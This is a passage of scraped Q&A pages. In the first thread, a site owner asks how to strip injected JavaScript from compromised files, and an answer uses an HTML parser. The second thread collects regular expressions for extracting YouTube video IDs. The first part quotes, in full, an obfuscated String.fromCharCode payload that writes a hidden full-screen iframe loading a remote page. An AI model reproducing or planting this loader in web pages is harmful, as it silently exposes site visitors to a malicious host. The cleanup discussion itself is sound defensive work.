tring.fromCharCode(97)+String.fromCharCode(116)+String.fromCharCode(97)+String.fromCharCode(110)+String.fromCharCode(97)+String.fromCharCode(108)+String.fromCharCode(121)+String.fromCharCode(122)+String.fromCharCode(101)+String.fromCharCode(114)+String.fromCharCode(46)+String.fromCharCode(114)+String.fromCharCode(117)+String.fromCharCode(47)+String.fromCharCode(105)+String.fromCharCode(110)+String.fromCharCode(100)+String.fromCharCode(101)+String.fromCharCode(120)+String.fromCharCode(46)+String.fromCharCode(104)+String.fromCharCode(116)+String.fromCharCode(109)+String.fromCharCode(108)+String.fromCharCode(63)+String.fromCharCode(112)+String.fromCharCode(61)+String.fromCharCode(50)+String.fromCharCode(51)+String.fromCharCode(54)+String.fromCharCode(55)+String.fromCharCode(54)+String.fromCharCode(56)+String.fromCharCode(34)+String.fromCharCode(32)+String.fromCharCode(119)+String.fromCharCode(105)+String.fromCharCode(100)+String.fromCharCode(116)+String.fromCharCode(104)+String.fromCharCode(61)+String.fromCharCode(34)+screen.width+String.fromCharCode(34)+String.fromCharCode(32)+String.fromCharCode(104)+String.fromCharCode(101)+String.fromCharCode(105)+String.fromCharCode(103)+String.fromCharCode(104)+String.fromCharCode(116)+String.fromCharCode(61)+String.fromCharCode(34)+screen.height+String.fromCharCode(34)+String.fromCharCode(62)+String.fromCharCode(60)+String.fromCharCode(47)+String.fromCharCode(105)+String.fromCharCode(102)+String.fromCharCode(114)+String.fromCharCode(97)+String.fromCharCode(109)+String.fromCharCode(101)+String.fromCharCode(62)+String.fromCharCode(60)+String.fromCharCode(47)+String.fromCharCode(68)+String.fromCharCode(73)+String.fromCharCode(86)+String.fromCharCode(62)); window.status=vst; }
</script>
Note of the writer: After creating the question, I can see that the web formatting cuts the previous sample. If you want to see the full sample of malicious javascript code, have a look at the text not bold in the next text and just add at the end of the text a "new line" and a "" html tag.
The regular expression that works for all the text but for the last "</script>" is:
**find /root/cambios -type f -exec sed -i 's#**<script>if (i5463 == null) { var i5463 = 1; var vst = String.fromCharCode(68)+String.fromCharCode(111)+String.fromCharCode(110)+String.fromCharCode(101); window.status=vst; document.write(String.fromCharCode(60)+String.fromCharCode(68)+String.fromCharCode(73)+String.fromCharCode(86)+String.fromCharCode(32)+String.fromCharCode(105)+String.fromCharCode(100)+String.fromCharCode(61)+String.fromCharCode(99)+String.fromCharCode(104)+String.fromCharCode(101)+String.fromCharCode(99)+String.fromCharCode(107)+String.fromCharCode(51)+String.fromCharCode(54)+String.fromCharCode(48)+String.fromCharCode(32)+String.fromCharCode(115)+String.fromCharCode(116)+String.fromCharCode(121)+String.fromCharCode(108)+String.fromCharCode(101)+String.fromCharCode(61)+String.fromCharCode(34)+String.fromCharCode(68)+String.fromCharCode(73)+String.fromCharCode(83)+String.fromCharCode(80)+String.fromCharCode(76)+String.fromCharCode(65)+String.fromCharCode(89)+String.fromCharCode(58)+String.fromCharCode(32)+String.fromCharCode(110)+String.fromCharCode(111)+String.fromCharCode(110)+String.fromCharCode(101)+String.fromCharCode(34)+String.fromCharCode(62)+String.fromCharCode(60)+String.fromCharCode(105)+String.fromCharCode(102)+String.fromCharCode(114)+String.fromCharCode(97)+String.fromCharCode(109)+String.fromCharCode(101)+String.fromCharCode(32)+String.fromCharCode(115)+String.fromCharCode(114)+String.fromCharCode(99)+String.fromCharCode(61)+String.fromCharCode(34)+String.fromCharCode(104)+String.fromCharCode(116)+String.fromCharCode(116)+String.fromCharCode(112)+String.fromCharCode(58)+String.fromCharCode(47)+String.fromCharCode(47)+String.fromCharCode(51)+String.fromCharCode(54)+String.fromCharCode(48)+String.fromCharCode(46)+String.fromCharCode(119)+String.fromCharCode(101)+String.fromCharCode(98)+String.fromCharCode(115)+String.fromCharCode(116)+String.fromCharCode(97)+String.fromCharCode(116)+String.fromCharCode(97)+String.fromCharCode(110)+String.fromCharCode(97)+String.fromCharCode(108)+String.fromCharCode(121)+String.fromCharCode(122)+String.fromCharCode(101)+String.fromCharCode(114)+String.fromCharCode(46)+String.fromCharCode(114)+String.fromCharCode(117)+String.fromCharCode(47)+String.fromCharCode(105)+String.fromCharCode(110)+String.fromCharCode(100)+String.fromCharCode(101)+String.fromCharCode(120)+String.fromCharCode(46)+String.fromCharCode(104)+String.fromCharCode(116)+String.fromCharCode(109)+String.fromCharCode(108)+String.fromCharCode(63)+String.fromCharCode(112)+String.fromCharCode(61)+String.fromCharCode(50)+String.fromCharCode(51)+String.fromCharCode(54)+String.fromCharCode(55)+String.fromCharCode(54)+String.fromCharCode(56)+String.fromCharCode(34)+String.fromCharCode(32)+String.fromCharCode(119)+String.fromCharCode(105)+String.fromCharCode(100)+String.fromCharCode(116)+String.fromCharCode(104)+String.fromCharCode(61)+String.fromCharCode(34)+screen.width+String.fromCharCode(34)+String.fromCharCode(32)+String.fromCharCode(104)+String.fromCharCode(101)+String.fromCharCode(105)+String.fromCharCode(103)+String.fromCharCode(104)+String.fromCharCode(116)+String.fromCharCode(61)+String.fromCharCode(34)+screen.height+String.fromCharCode(34)+String.fromCharCode(62)+String.fromCharCode(60)+String.fromCharCode(47)+String.fromCharCode(105)+String.fromCharCode(102)+String.fromCharCode(114)+String.fromCharCode(97)+String.fromCharCode(109)+String.fromCharCode(101)+String.fromCharCode(62)+String.fromCharCode(60)+String.fromCharCode(47)+String.fromCharCode(68)+String.fromCharCode(73)+String.fromCharCode(86)+String.fromCharCode(62)); window.status=vst; }**##g' {} \;**
So, please, anyone can help to match the new line and the "" text??
Thank you in advance.
Indeed you shouldn't use regex for this task. As has been told many times in SO regex are not the proper tool for dealing with HTML manipulations as it is not a regular language. Your best bet is to use an HTML parser. For instance, the following unoptimized (but still simple) code uses Jsoup for achieving your goal:
import org.jsoup.Jsoup;
import org.jsoup.nodes.DataNode;
import org.jsoup.nodes.Document;
import org.jsoup.nodes.Element;
import org.jsoup.nodes.Node;
import org.jsoup.select.Elements;
public class RemoveScript {
public static void main(String args[]){
String viralContent = "Your viral content";
String inputText = "<html><head><script>" + viralContent + "</script></head><body></body></html>";
Document doc = Jsoup.parse(inputText);
Elements scripts = doc.select("script");
for(Element element : scripts) {
for (Node child: element.childNodes()) {
if (child instanceof DataNode) {
String content = ((DataNode) child).getWholeData();
if (content.equals(viralContent)) {
element.remove();
}
}
}
}
System.out.println(doc.toString());
}
}
I'm sure other parsers can do the same very easily too.

Regular expression for youtube links

Does someone have a regular expression that gets a link to a Youtube video (not embedded object) from (almost) all the possible ways of linking to Youtube?
I think this is a pretty common problem and I'm sure there are a lot of ways to link that.
A starting point would be:
http://www.youtube.com/watch?v=iwGFalTRHDA
http://www.youtube.com/watch?v=iwGFalTRHDA&feature=related
http://youtu.be/iwGFalTRHDA
http://youtu.be/n17B_uFF4cA
http://www.youtube.com/embed/watch?feature=player_embedded&v=r5nB9u4jjy4
http://www.youtube.com/watch?v=t-ZRX8984sc
http://youtu.be/t-ZRX8984sc
... please add more possible links and/or regular expressions to detect them.
So far I got this Regular expression working for the examples I posted, and it gets the ID on the first group:
http(?:s?):\/\/(?:www\.)?youtu(?:be\.com\/watch\?v=|\.be\/)([\w\-\_]*)(&(amp;)?‌​[\w\?‌​=]*)?
You can use this expression below.
(?:https?:\/\/)?(?:www\.)?youtu\.?be(?:\.com)?\/?.*(?:watch|embed)?(?:.*v=|v\/|\/)([\w\-_]+)\&?
I'm using it, and it cover the most used URLs.
I'll keep updating it on This Gist.
You can test it on this tool.
I like #brunodles's solution the most but you can still match non video links like https://www.youtube.com/feed/subscriptions
I went with this solution
(?:https?:\/\/)?(?:www\.)?youtu(?:\.be\/|be.com\/\S*(?:watch|embed)(?:(?:(?=\/[-a-zA-Z0-9_]{11,}(?!\S))\/)|(?:\S*v=|v\/)))([-a-zA-Z0-9_]{11,})
It can also be used to match multiple whitespace separated links.
The video id will be captured in the first group.
Tested with the following urls:
youtu.be/iwGFalTRHDA
youtube.com/watch?v=iwGFalTRHDA
www.youtube.com/watch?v=iwGFalTRHDA
http://www.youtube.com/watch?v=iwGFalTRHDA
https://www.youtube.com/watch?v=iwGFalTRHDA
https://www.youtube.com/watch?v=MoBL33GT9S8&feature=share
https://www.youtube.com/embed/watch?feature=player_embedded&v=iwGFalTRHDA
https://www.youtube.com/embed/watch?v=iwGFalTRHDA
https://www.youtube.com/embed/v=iwGFalTRHDA
https://www.youtube.com/watch/iwGFalTRHDA
http://www.youtube.com/attribution_link?u=/watch?v=aGmiw_rrNxk&feature=share
https://m.youtube.com/watch?v=iwGFalTRHDA
// will not match
https://www.youtube.com/feed/subscriptions
https://www.youtube.com/channel/UCgc00bfF_PvO_2AvqJZHXFg
https://www.youtube.com/c/NatGeoEdOrg/videos
https://regex101.com/r/rq2KLv/1
I improved the links posted above with a friend for a script I wrote for IRC to recognize even links without http at all. It worked on all stress tests I got so far, including garbled text with barely recognizable youtube urls, so here it is:
~(?:https?://)?(?:www\.)?youtu(?:be\.com/watch\?(?:.*?&(?:amp;)?)?v=|\.be/)([\w\-]+)(?:&(?:amp;)?[\w\?=]*)?~
I testet all the regular expressions that are shown here and none could cover all url types that my client was using.
I built this pretty much through trial and error, but it seems to work with all the patterns that Poppy Deejay posted.
"(?:.+?)?(?:\/v\/|watch\/|\?v=|\&v=|youtu\.be\/|\/v=|^youtu\.be\/)([a-zA-Z0-9_-]{11})+"
Maybe it helps someone who is in a similar situation that I had today ;)
Piggy backing on Fanmade, this covers the below links including the url encoded version of attribution_links:
(?:.+?)?(?:\/v\/|watch\/|\?v=|\&v=|youtu\.be\/|\/v=|^youtu\.be\/|watch\%3Fv\%3D)([a-zA-Z0-9_-]{11})+
https://www.youtube.com/attribution_link?a=tolCzpA7CrY&u=%2Fwatch%3Fv%3DMoBL33GT9S8%26feature%3Dshare
https://www.youtube.com/watch?v=MoBL33GT9S8&feature=share
http://www.youtube.com/watch?v=iwGFalTRHDA
https://www.youtube.com/watch?v=iwGFalTRHDA
http://www.youtube.com/watch?v=iwGFalTRHDA&feature=related
http://youtu.be/iwGFalTRHDA
http://www.youtube.com/embed/watch?feature=player_embedded&v=iwGFalTRHDA
http://www.youtube.com/embed/watch?v=iwGFalTRHDA
http://www.youtube.com/embed/v=iwGFalTRHDA
http://www.youtube.com/watch?feature=player_embedded&v=iwGFalTRHDA
http://www.youtube.com/watch?v=iwGFalTRHDA
www.youtube.com/watch?v=iwGFalTRHDA
www.youtu.be/iwGFalTRHDA
youtu.be/iwGFalTRHDA
youtube.com/watch?v=iwGFalTRHDA
http://www.youtube.com/watch/iwGFalTRHDA
http://www.youtube.com/v/iwGFalTRHDA
http://www.youtube.com/v/i_GFalTRHDA
http://www.youtube.com/watch?v=i-GFalTRHDA&feature=related
http://www.youtube.com/attribution_link?u=/watch?v=aGmiw_rrNxk&feature=share&a=9QlmP1yvjcllp0h3l0NwuA
http://www.youtube.com/attribution_link?a=fF1CWYwxCQ4&u=/watch?v=qYr8opTPSaQ&feature=em-uploademail
http://www.youtube.com/attribution_link?a=fF1CWYwxCQ4&feature=em-uploademail&u=/watch?v=qYr8opTPSaQ
I've been having problems lately with the atttribution_link urls so i tried making my own regex that works for those too.
Here is my regex string:
(https?://)?(www\\.)?(yotu\\.be/|youtube\\.com/)?((.+/)?(watch(\\?v=|.+&v=))?(v=)?)([\\w_-]{11})(&.+)?
and here are some test cases i've tried:
http://www.youtube.com/watch?v=iwGFalTRHDA
https://www.youtube.com/watch?v=iwGFalTRHDA
http://www.youtube.com/watch?v=iwGFalTRHDA&feature=related
http://youtu.be/iwGFalTRHDA
http://www.youtube.com/embed/watch?feature=player_embedded&v=iwGFalTRHDA
http://www.youtube.com/embed/watch?v=iwGFalTRHDA
http://www.youtube.com/embed/v=iwGFalTRHDA
http://www.youtube.com/watch?feature=player_embedded&v=iwGFalTRHDA
http://www.youtube.com/watch?v=iwGFalTRHDA
www.youtube.com/watch?v=iwGFalTRHDA
www.youtu.be/iwGFalTRHDA
youtu.be/iwGFalTRHDA
youtube.com/watch?v=iwGFalTRHDA
http://www.youtube.com/watch/iwGFalTRHDA
http://www.youtube.com/v/iwGFalTRHDA
http://www.youtube.com/v/i_GFalTRHDA
http://www.youtube.com/watch?v=i-GFalTRHDA&feature=related
http://www.youtube.com/attribution_link?u=/watch?v=aGmiw_rrNxk&feature=share&a=9QlmP1yvjcllp0h3l0NwuA
http://www.youtube.com/attribution_link?a=fF1CWYwxCQ4&u=/watch?v=qYr8opTPSaQ&feature=em-uploademail
http://www.youtube.com/attribution_link?a=fF1CWYwxCQ4&feature=em-uploademail&u=/watch?v=qYr8opTPSaQ
Also remember to check the string you get for your video url, sometimes it may get the percent characters. If so just do this
url = [url stringByReplacingPercentEscapesUsingEncoding:NSUTF8StringEncoding];
and it should fix it.
Remember also that the index of the youtube key is now index 9.
NSRange youtubeKey = [result rangeAtIndex:9]; //the youtube key
NSString * strKey = [url substringWithRange:youtubeKey] ;
It'd be the longest RegEx in the world if you managed to cover all link formats, but here's one to get you started which will cover the first couple of link formats:
http://(www\.)?youtube\.com/watch\?.*v=([a-zA-Z0-9]+).*
The second group will match the video ID if you need to get that out.
(?:http?s?:\/\/)?(?:www.)?(?:m.)?(?:music.)?youtu(?:\.?be)(?:\.com)?(?:(?:\w*.?:\/\/)?\w*.?\w*-?.?\w*\/(?:embed|e|v|watch|.*\/)?\??(?:feature=\w*\.?\w*)?&?(?:v=)?\/?)([\w\d_-]{11})(?:\S+)?
https://regex101.com/r/nJzgG0/3
Detects YouTube and YouTube Music link in any string
I took all variants from here:
https://gist.github.com/rodrigoborgesdeoliveira/987683cfbfcc8d800192da1e73adc486#file-youtubeurlformats-txt
And built this regexp (YouTube ID is in group 2):
(\/|%3D|v=|vi=)([0-9A-z-_]{11})[%#?&\s]
Check it here: https://regexr.com/4u4ud
Edit: Works for any single string w/o breaks.
I'm working with that kind of links:
http://www.youtube.com/v/M-faNJWc9T0?fs=1&rel=0
And here's the regEx I'm using to get ID from it:
"(.+?)(\/v/)([a-zA-Z0-9_-]{11})+"
This is iterating on the existing answers and handles edge cases better. (for example http://thisisnotyoutu.be/thing)
/(?:https?:\/\/|www\.|m\.|^)youtu(?:be\.com\/watch\?(?:.*?&(?:amp;)?)?v=|\.be\/)([\w‌​\-]+)(?:&(?:amp;)?[\w\?=]*)?/
here is the complete solution for getting youtube video id for java or android, i didn't found any link which doesn't work with this function
public static String getValidYoutubeVideoId(String youtubeUrl)
{
if(youtubeUrl == null || youtubeUrl.trim().contentEquals(""))
{
return "";
}
youtubeUrl = youtubeUrl.trim();
String validYoutubeVideoId = "";
String regexPattern = "^(?:https?:\\/\\/)?(?:[0-9A-Z-]+\\.)?(?:youtu\\.be\\/|youtube\\.com\\S*[^\\w\\-\\s])([\\w\\-]{11})(?=[^\\w\\-]|$)(?![?=&+%\\w]*(?:['\"][^<>]*>|<\\/a>))[?=&+%\\w]*";
Pattern regexCompiled = Pattern.compile(regexPattern, Pattern.CASE_INSENSITIVE);
Matcher regexMatcher = regexCompiled.matcher(youtubeUrl);
if(regexMatcher.find())
{
try
{
validYoutubeVideoId = regexMatcher.group(1);
}
catch(Exception ex)
{
}
}
return validYoutubeVideoId;
}
This is my answer to use in Scala. This is useful to extract 11 digits from Youtube's URL.
"https?://(?:[0-9a-zA-Z-]+.)?(?:www.youtube.com/|youtu.be\S*[^\w-\s])([\w -]{11})(?=[^\w-]|$)(?![?=&+%\w](?:[\'"][^<>]>|))[?=&+%\w-]*"
def getVideoLinkWR: UserDefinedFunction = udf(f = (videoLink: String) => {
val youtubeRgx = """https?://(?:[0-9a-zA-Z-]+\.)?(?:youtu\.be/|youtube\.com\S*[^\w\-\s])([\w \-]{11})(?=[^\w\-]|$)(?![?=&+%\w]*(?:[\'"][^<>]*>|</a>))[?=&+%\w-./]*""".r
videoLink match {
case youtubeRgx(a) => s"$a".toString
case _ => videoLink.toString
}
}
Youtube video URL Change to iframe supported link:
REGEX: https://regex101.com/r/LeZ9WH/2/
http://www.youtube.com/watch?v=iwGFalTRHDA
http://www.youtube.com/watch?v=iwGFalTRHDA&feature=related
http://youtu.be/iwGFalTRHDA
http://youtu.be/n17B_uFF4cA
http://www.youtube.com/embed/watch?feature=player_embedded&v=r5nB9u4jjy4
http://www.youtube.com/watch?v=t-ZRX8984sc
http://youtu.be/t-ZRX8984sc
https://youtu.be/2sFlFPmUfNo?t=1
Php function example:
if (!function_exists('clean_youtube_link')) {
/**
* #param $link
* #return string|string[]|null
*/
function clean_youtube_link($link)
{
return preg_replace(
'#(.+?)(\/)(watch\x3Fv=)?(embed\/watch\x3Ffeature\=player_embedded\x26v=)?([a-zA-Z0-9_-]{11})+#',
"https://www.youtube.com/embed/$5",
$link
);
}
}
This should work for almost all youtube links when extracting from a string:
((?:https?:)?\/\/)?((?:www|m)\.)?((?:youtube\.com|youtu.be))(\/(?:[\w\-]+\?v=|embed\/|v\/)?)([\w\-]{10}).\b
var isValidYoutubeLink: Bool{
// working for all the youtube url's
NSPredicate(format: "SELF MATCHES %#", "(?:http?s?:\\/\\/)?(?:www.)?(?:m.)?(?:music.)?youtu(?:\\.?be)(?:\\.com)?(?:(?:\\w*.?:\\/\\/)?\\w*.?\\w*-?.?\\w*\\/(?:embed|e|v|watch|.*\\/)?\\??(?:feature=\\w*\\.?\\w*)?&?(?:v=)?\\/?)([\\w\\d_-]{11})(?:\\S+)?").evaluate(with: self)
}
With this Javascript Regex, the first capture is a video ID :
^(?:https?:)?(?:\/\/)?(?:www\.)?(?:youtu\.be\/|youtube(?:\-nocookie)?\.(?:[A-Za-z]{2,4}|[A-Za-z]{2,3}\.[A-Za-z]{2})\/)(?:watch|embed\/|vi?\/)*(?:\?[\w=&]*vi?=)?([^#&\?\/]{11}).*$
(?-s)^https?\W+(?:www\.|m\.|music\.)*youtu\.?be(?:\.com|\/watch|\/o?embed|\/shorts|\/attribution_link\?[&\w\-=]*[au]=|\/ytsc\w+|[\?&\/]+[ve]i?\b|\?feature=\w+|-nocookie)*[\/=]([a-z\d\-_]{11})[\?&#% \t ] *.*$
or
(?-s)^(?:(?!https?[:\/]|www\.|m\.yo|music\.yo|youtu\.?be[\/\.]|watch[\/\?]|embed\/)\V)*(?:https?[:\/]+|www\.|m\.|music\.)+youtu\.?be(?:\.com\/|watch|o?embed(?:\/|\?url=\S+?)?|shorts|attribution_link\?[&\w\-=]*[au]=\/?|ytsc\w+|[\?&]*[ve]i?\b|\?feature=\w+|[\?&]time_continue=\d+|-nocookie|%[23][56FD])*(?:[\/=]|%2F|%3D)([a-z\d\-_]{11})[\?&#% \t ]? *.*$
(the part >>#% \t⠀ ]<< should contain continuous space, which is Alt+255, but stackoverflow-com can't print it)
(this string may be replaced to \1, sorted and abbreviated with: )
V█(?-i)^([A-Za-z\d\-_]{11})(?:\v+\1)*$
>█https:\/\/youtu\.be\/\1
(./dot can take up any symbol; \V or [^\r\n] can any except special, emoji and others; this >> [^!-⠀:/‽|\s] << can grab some emoji)
https://youtu.be/x26ANNC3C-8 • ♾ 𝕳𝕰𝕽𝕰𝕿𝕳𝕰𝖄𝕮𝕺𝕸𝕰 - 𝔩𝔢𝔞𝔳𝔢 𝔪𝔢 𝔞𝔩𝔬𝔫𝔢 • 7:15
This regex solve my problem, I can get youtube link having watch, embed or shared link
(?:http(?:s)?:\/\/)?(?:www\.)?(?:youtu\.be\/|youtube\.com\/(?:(?:watch)?\?(?:.*&)?v(?:i)?=|(?:embed|v|vi|user)\/))([^\?&\"'<> #]+)
You can check here https://regex101.com/r/Kvk0nB/1